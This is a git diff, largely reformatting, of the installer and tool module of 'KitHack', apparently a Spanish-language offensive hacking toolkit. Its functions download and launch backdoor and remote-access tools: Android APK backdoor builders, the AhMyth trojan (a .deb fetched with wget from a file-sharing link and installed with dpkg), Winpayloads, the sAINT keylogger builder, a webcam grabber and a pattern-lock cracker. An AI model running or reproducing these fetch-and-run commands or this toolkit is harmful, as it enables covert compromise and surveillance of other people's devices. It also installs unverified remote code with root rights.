NOT FOUND ]" + sleep 1.5 + echo -e "$yellow[!][Installing Pwgen...]" + xterm -T "INSTALLER PWGEN" -geometry 100x30 -e "sudo apt-get install pwgen" fi # Configuring folders -echo -e $yellow -echo -n [*] Configurando carpetas...= ; -sleep 3 & while [ "$(ps a | awk '{print $1}' | grep $!)" ] ; do for X in '-' '\' '|' '/'; do echo -en "\b$X"; sleep 0.1; done; done +echo -e "$yellow" +echo -n [*] Configurando carpetas...= +sleep 3 & +while [ "$(ps a | awk '{print $1}' | grep $!)" ]; do for X in '-' '\' '|' '/'; do + echo -en "\b$X" + sleep 0.1 +done; done echo "" -echo -e $green +echo -e "$green" if [ -d output ]; then -echo -e "[✔]Ya existe $path/output" -sleep 0.2 + echo -e "[✔]Ya existe $path/output" + sleep 0.2 else -mkdir output -echo -e "[✔]$path/output" -sleep 0.2 + mkdir output + echo -e "[✔]$path/output" + sleep 0.2 fi if [ -d tools/Android ]; then -echo -e "[✔]Ya existe $path/tools/Android" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Android" + sleep 0.2 else -mkdir -p tools/Android -echo -e "[✔]$path/tools/Android" -sleep 0.2 + mkdir -p tools/Android + echo -e "[✔]$path/tools/Android" + sleep 0.2 fi if [ -d tools/Windows ]; then -echo -e "[✔]Ya existe $path/tools/Windows" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Windows" + sleep 0.2 else -mkdir -p tools/Windows -echo -e "[✔]$path/tools/Windows" -sleep 0.2 + mkdir -p tools/Windows + echo -e "[✔]$path/tools/Windows" + sleep 0.2 fi if [ -d tools/Phishing ]; then -echo -e "[✔]Ya existe $path/tools/Phishing" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Phishing" + sleep 0.2 else -mkdir -p tools/Phishing -echo -e "[✔]$path/tools/Phishing" -sleep 0.2 + mkdir -p tools/Phishing + echo -e "[✔]$path/tools/Phishing" + sleep 0.2 fi if [ -d tools/Wifi ]; then -echo -e "[✔]Ya existe $path/tools/Wifi" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Wifi" + sleep 0.2 else -mkdir -p tools/Wifi -echo -e "[✔]$path/tools/Wifi" -sleep 0.2 + mkdir -p tools/Wifi + echo -e "[✔]$path/tools/Wifi" + sleep 0.2 fi if [ -d tools/Passwords ]; then -echo -e "[✔]Ya existe $path/tools/Passwords" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Passwords" + sleep 0.2 else -mkdir -p tools/Passwords -echo -e "[✔]$path/tools/Passwords" -sleep 0.2 + mkdir -p tools/Passwords + echo -e "[✔]$path/tools/Passwords" + sleep 0.2 fi if [ -d tools/Web ]; then -echo -e "[✔]Ya existe $path/tools/Web" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Web" + sleep 0.2 else -mkdir -p tools/Web -echo -e "[✔]$path/tools/Web" -sleep 0.2 + mkdir -p tools/Web + echo -e "[✔]$path/tools/Web" + sleep 0.2 fi if [ -d tools/Spoofing ]; then -echo -e "[✔]Ya existe $path/tools/Spoofing" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Spoofing" + sleep 0.2 else -mkdir -p tools/Spoofing -echo -e "[✔]$path/tools/Spoofing" -sleep 0.2 + mkdir -p tools/Spoofing + echo -e "[✔]$path/tools/Spoofing" + sleep 0.2 fi if [ -d tools/InformationGathering ]; then -echo -e "[✔]Ya existe $path/tools/InformationGathering" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/InformationGathering" + sleep 0.2 else -mkdir -p tools/InformationGathering -echo -e "[✔]$path/tools/InformationGathering" -sleep 0.2 + mkdir -p tools/InformationGathering + echo -e "[✔]$path/tools/InformationGathering" + sleep 0.2 fi if [ -d tools/Others ]; then -echo -e "[✔]Ya existe $path/tools/Others" -sleep 0.2 + echo -e "[✔]Ya existe $path/tools/Others" + sleep 0.2 else -mkdir -p tools/Others -echo -e "[✔]$path/tools/Others" -sleep 0.2 + mkdir -p tools/Others + echo -e "[✔]$path/tools/Others" + sleep 0.2 fi if [ -d .config ]; then -echo -e "[✔]Ya existe $path/.config" -sleep 0.2 + echo -e "[✔]Ya existe $path/.config" + sleep 0.2 else -mkdir -p .config -echo -e "[✔]$path/.config" -sleep 0.2 + mkdir -p .config + echo -e "[✔]$path/.config" + sleep 0.2 fi # Installing requirements -echo -e $yellow -echo -n [*] Instalando requerimientos de python...= ; -sleep 3 & while [ "$(ps a | awk '{print $1}' | grep $!)" ] ; do for X in '-' '\' '|' '/'; do echo -en "\b$X"; sleep 0.1; done; done +echo -e "$yellow" +echo -n [*] Instalando requerimientos de python...= +sleep 3 & +while [ "$(ps a | awk '{print $1}' | grep $!)" ]; do for X in '-' '\' '|' '/'; do + echo -en "\b$X" + sleep 0.1 +done; done echo "" -echo -e $green +echo -e "$green" pip3 install requests pip3 install py-getch apt-get install python3-tk @@ -293,9 +287,13 @@ apt-get install libatk-adaptor libgail-common sudo apt-get purge fcitx-module-dbus # Shortcut for kithack -echo -e $yellow -echo -n [*] Configuración de acceso directo...= ; -sleep 3 & while [ "$(ps a | awk '{print $1}' | grep $!)" ] ; do for X in '-' '\' '|' '/'; do echo -en "\b$X"; sleep 0.1; done; done +echo -e "$yellow" +echo -n [*] Configuración de acceso directo...= +sleep 3 & +while [ "$(ps a | awk '{print $1}' | grep $!)" ]; do for X in '-' '\' '|' '/'; do + echo -en "\b$X" + sleep 0.1 +done; done echo "" echo "" echo -e "$green[!] ¿Desea poder ejecutar kithack desde cualquier lugar de su terminal? (y/n)" @@ -304,30 +302,30 @@ echo -ne "KitHack >> $default" read -r option case "$option" in -y|Y) -lnk=$? -if [ "$lnk" == "0" ];then -run="cd $path && sudo python3 KitHack.py" -touch /usr/local/bin/kithack -echo "#!/bin/bash" > /usr/local/bin/kithack -echo "$run" >> /usr/local/bin/kithack -chmod +x /usr/local/bin/kithack -cp images/kithack.desktop /usr/share/applications/kithack.desktop -cp images/kithack.png /usr/share/icons/kithack.png -sleep 2 -echo -e $green -echo -e "╔──────────────────────────────────────────────────────────╗" -echo -e "|[✔] Installation complete. Type 'kithack' to run the tool.|" -echo -e "┖──────────────────────────────────────────────────────────┙" -fi -;; + y | Y) + lnk=$? + if [ "$lnk" == "0" ]; then + run="cd $path && sudo python3 KitHack.py" + touch /usr/local/bin/kithack + echo "#!/bin/bash" >/usr/local/bin/kithack + echo "$run" >>/usr/local/bin/kithack + chmod +x /usr/local/bin/kithack + cp images/kithack.desktop /usr/share/applications/kithack.desktop + cp images/kithack.png /usr/share/icons/kithack.png + sleep 2 + echo -e "$green" + echo -e "╔──────────────────────────────────────────────────────────╗" + echo -e "|[✔] Installation complete. Type 'kithack' to run the tool.|" + echo -e "┖──────────────────────────────────────────────────────────┙" + fi + ;; -n|N) -sleep 2 -echo -e $green -echo -e "╔──────────────────────────╗" -echo -e "|[✔] Installation complete.|" -echo -e "┖──────────────────────────┙" -;; + n | N) + sleep 2 + echo -e "$green" + echo -e "╔──────────────────────────╗" + echo -e "|[✔] Installation complete.|" + echo -e "┖──────────────────────────┙" + ;; esac exit diff --git a/lib/kitools.py b/lib/kitools.py index 3429426..5fb80bb 100644 --- a/lib/kitools.py +++ b/lib/kitools.py @@ -1,2727 +1,4211 @@ #!/usr/bin/python3 # -*- coding: utf-8 -*- -#Copyright 2021 KITHACK -#Written by: Adrian Guillermo -#Facebook: https://facebook.com/adrian.guillermo.22 -#Github: https://github.com/AdrMXR - -BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = '\33[94m', '\033[91m', '\33[97m', '\033[36m', '\033[0m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m', '\033[1m' - +# Copyright 2021 KITHACK +# Written by: Adrian Guillermo +# Facebook: https://facebook.com/adrian.guillermo.22 +# Github: https://github.com/AdrMXR import os -import time import sys +import time from sys import exit + from getch import pause + from KitHack import main +BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = ( + "\33[94m", + "\033[91m", + "\33[97m", + "\033[36m", + "\033[0m", + "\33[93m", + "\033[1;35m", + "\033[1;32m", + "\033[0m", + "\033[1m", +) + location = os.getcwd() -#Tools Android +# Tools Android + + def BackdoorApk(): - if not os.path.isdir('tools/Android/backdoor-apk'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/dana-at-cp/backdoor-apk.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/backdoor-apk".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd backdoor-apk && cd backdoor-apk && bash backdoor-apk.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd backdoor-apk && cd backdoor-apk && bash backdoor-apk.sh') + if not os.path.isdir("tools/Android/backdoor-apk"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/dana-at-cp/backdoor-apk.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/backdoor-apk" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd backdoor-apk && cd backdoor-apk && bash backdoor-apk.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd backdoor-apk && cd backdoor-apk && bash backdoor-apk.sh" + ) + def EvilDroid(): - if not os.path.isdir('tools/Android/Evil-Droid'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/M4sc3r4n0/Evil-Droid.git && cd Evil-Droid && chmod +x evil-droid') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/Evil-Droid".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd Evil-Droid && bash evil-droid') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd Evil-Droid && bash evil-droid') + if not os.path.isdir("tools/Android/Evil-Droid"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/M4sc3r4n0/Evil-Droid.git && cd Evil-Droid && chmod +x evil-droid" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/Evil-Droid" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd Evil-Droid && bash evil-droid") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd Evil-Droid && bash evil-droid") + def Spade(): - if not os.path.isdir('tools/Android/spade'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/turksiberguvenlik/spade.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/spade".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd spade && python spade.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd spade && python spade.py') + if not os.path.isdir("tools/Android/spade"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/turksiberguvenlik/spade.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/spade" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Android && cd spade && python spade.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("cd tools && cd Android && cd spade && python spade.py") + def AhMyth(): - if not os.path.isdir('tools/Android/AhMyth'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && mkdir AhMyth && cd AhMyth && wget http://download1581.mediafire.com/yda7cvfrnesg/ifxzqonwvff2wir/AhMyth_linux64.deb && dpkg -i AhMyth_linux64.deb && apt --fix-broken install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/local/bin/ahmyth".format(GREEN, DEFAULT)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('ahmyth') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('ahmyth') + if not os.path.isdir("tools/Android/AhMyth"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && mkdir AhMyth && cd AhMyth && wget http://download1581.mediafire.com/yda7cvfrnesg/ifxzqonwvff2wir/AhMyth_linux64.deb && dpkg -i AhMyth_linux64.deb && apt --fix-broken install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en /usr/local/bin/ahmyth". + format(GREEN, DEFAULT)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("ahmyth") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("ahmyth") + def Andspoilt(): - if not os.path.isdir('tools/Android/Andspoilt'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/sundaysec/Andspoilt.git && cd Andspoilt && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/Andspoilt".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('andspoilt') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('andspoilt') + if not os.path.isdir("tools/Android/Andspoilt"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/sundaysec/Andspoilt.git && cd Andspoilt && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/Andspoilt" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("andspoilt") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("andspoilt") + def Kwetza(): - if not os.path.isdir('tools/Android/kwetza'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/sensepost/kwetza.git && cd kwetza && pip install beautifulsoup4') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/kwetza".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd kwetza && python kwetza.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd kwetza && python kwetza.py') + if not os.path.isdir("tools/Android/kwetza"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/sensepost/kwetza.git && cd kwetza && pip install beautifulsoup4" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/kwetza" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd kwetza && python kwetza.py") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd kwetza && python kwetza.py") + def Termux(): - if not os.path.isdir('tools/Android/Termux'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && mkdir Termux && cd Termux && wget https://f-droid.org/repo/com.termux_96.apk') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/Termux".format(GREEN, DEFAULT, location)) - pause("\n{}Presione una tecla para continuar...".format(GREEN)) - os.system('clear') - main() - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() + if not os.path.isdir("tools/Android/Termux"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && mkdir Termux && cd Termux && wget https://f-droid.org/repo/com.termux_96.apk" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/Termux" + .format(GREEN, DEFAULT, location)) + pause("\n{}Presione una tecla para continuar...".format(GREEN)) + os.system("clear") + main() + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + def AndroidExploits(): - if not os.path.isdir('tools/Android/Android-Exploits'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/sundaysec/Android-Exploits.git') - print("\n{0}[✔] Done.{1}\nExploits guardados en {2}/tools/Android/Android-Exploits".format(GREEN, DEFAULT, location)) - pause("\n{}Presione una tecla para continuar...".format(GREEN)) - os.system('clear') - main() - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() + if not os.path.isdir("tools/Android/Android-Exploits"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/sundaysec/Android-Exploits.git" + ) + print( + "\n{0}[✔] Done.{1}\nExploits guardados en {2}/tools/Android/Android-Exploits" + .format(GREEN, DEFAULT, location)) + pause("\n{}Presione una tecla para continuar...".format(GREEN)) + os.system("clear") + main() + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + def Grabcam(): - if not os.path.isdir('tools/Android/grabcam'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/noob-hackers/grabcam.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/grabcam".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd grabcam && bash grabcam.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd grabcam && bash grabcam.sh') + if not os.path.isdir("tools/Android/grabcam"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/noob-hackers/grabcam.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/grabcam" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd grabcam && bash grabcam.sh") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd grabcam && bash grabcam.sh") + def AndroidPatternLock(): - if not os.path.isdir('tools/Android/androidpatternlock'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Android && git clone https://github.com/sch3m4/androidpatternlock.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/androidpatternlock".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd androidpatternlock && python aplc.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Android && cd androidpatternlock && python aplc.py') - -#Tools Windows + if not os.path.isdir("tools/Android/androidpatternlock"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Android && git clone https://github.com/sch3m4/androidpatternlock.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Android/androidpatternlock" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd androidpatternlock && python aplc.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Android && cd androidpatternlock && python aplc.py" + ) + + +# Tools Windows + + def Winpayloads(): - if not os.path.isdir('tools/Windows/Winpayloads'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd Windows && git clone https://github.com/nccgroup/Winpayloads.git && cd Winpayloads && chmod +x setup.sh && bash setup.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/Winpayloads".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd Winpayloads && python WinPayloads.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd Winpayloads && python WinPayloads.py') + if not os.path.isdir("tools/Windows/Winpayloads"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd Windows && git clone https://github.com/nccgroup/Winpayloads.git && cd Winpayloads && chmod +x setup.sh && bash setup.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/Winpayloads" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd Winpayloads && python WinPayloads.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd Winpayloads && python WinPayloads.py" + ) + def sAINT(): - if not os.path.isdir('tools/Windows/sAINT'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y && apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y && cd tools && cd Windows && git clone https://github.com/tiagorlampert/sAINT.git && cd sAINT && chmod +x configure.sh && bash configure.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/sAINT".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd sAINT && java -jar sAINT.jar') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd Windows && cd sAINT && java -jar sAINT.jar') + if not os.path.isdir("tools/Windows/sAINT"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y && apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y && cd tools && cd Windows && git clone https://github.com/tiagorlampert/sAINT.git && cd sAINT && chmod +x configure.sh && bash configure.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/Windows/sAINT" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd Windows && cd sAINT && java -jar sAINT.jar") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) 